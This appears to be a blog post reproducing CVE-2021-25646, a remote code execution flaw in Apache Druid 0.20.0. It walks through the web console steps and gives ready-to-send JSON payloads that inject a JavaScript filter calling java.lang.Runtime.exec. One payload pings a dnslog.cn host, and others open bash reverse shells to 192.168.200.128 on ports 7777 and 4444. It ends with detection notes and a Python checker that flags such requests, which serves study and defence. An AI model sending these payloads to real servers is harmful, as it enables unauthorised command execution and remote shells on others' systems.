CVE-2021-25646 (Apache Druid, port 8888) vulnerability reproduction

Environment: pull Apache Druid 0.20.0 directly with docker.

Steps:

1. Open the home page (opening it via localhost does not work properly).

2. Load data → Local disk

3. Base directory >> quickstart/tutorial

4. File filter >> wikiticker-2015-09-12-sampled.json.gz

5. Preview

6. Next: Parse data (with a proxy attached, Burp Suite)

7. Modify the request body and insert the payload.

DNS lookup payload:

```json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 7wsyab.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
```

```json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
```


The following statement is the part of the payload that executes the command:

```json
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/7777 0>&1')}"
```

When running in docker, start the experiment while the docker command is still loading the data; if docker is exited midway and restarted, druid may be unable to take over the data import, and the payload will keep failing.

To decide from a network-level packet capture whether a request is an attack, rely mainly on the extra portion of the request and the command-executing code: a normal request never calls the java.lang.Runtime.getRuntime() function and never carries this extra piece of code, and the command-executing code is the key to determining what this particular attack is trying to achieve.

```
":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/4444 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"
```
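The check described above, written out as an added example (not code from the original post): it walks a captured Druid sampler request body and flags the three indicators the write-up names, a `javascript`-typed filter, a function string that reaches `java.lang.Runtime`, and the empty-key `""` object that force-enables JavaScript. The two request bodies are constructed for the example, not captured traffic.

```python
import json
import re

# Indicators from the write-up: the function body reaching into the Java runtime.
RUNTIME_RE = re.compile(r"java\.lang\.Runtime|getRuntime\s*\(|ProcessBuilder")


def walk(node, path=""):
    """Yield (json_path, dict) for every JSON object in the document."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def inspect_sampler_request(body: str) -> list:
    """Return a list of findings for one captured sampler request body (empty = clean)."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"unparseable body: {exc}"]
    findings = []
    for path, obj in walk(doc):
        if obj.get("type") != "javascript":
            continue
        findings.append(f"{path}: javascript-typed spec (JavaScript is disabled by default)")
        if RUNTIME_RE.search(str(obj.get("function", ""))):
            findings.append(f"{path}.function: reaches java.lang.Runtime -> command execution")
        injected = obj.get("")
        if isinstance(injected, dict) and str(injected.get("enabled", "")).lower() == "true":
            findings.append(f"{path}: empty-key object force-enables JavaScript")
    return findings


# Constructed request bodies shaped like the write-up's payload; 'id' stands in for the command.
MALICIOUS = json.dumps({"type": "index", "spec": {"type": "index", "dataSchema": {"dataSource": "sample",
    "transformSpec": {"transforms": [], "filter": {"type": "javascript",
        "function": "function(value){return java.lang.Runtime.getRuntime().exec('id')}",
        "dimension": "added", "": {"enabled": "true"}}}}},
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000}})
BENIGN = json.dumps({"type": "index", "spec": {"type": "index", "dataSchema": {"dataSource": "sample",
    "transformSpec": {"transforms": [], "filter": {"type": "selector", "dimension": "added", "value": "0"}}}},
    "samplerConfig": {"numRows": 500, "timeoutMs": 15000}})

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, inspect_sampler_request(body) or ["no findings"])
```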

Posted 2021-02-08 14:59 by 日月的阿金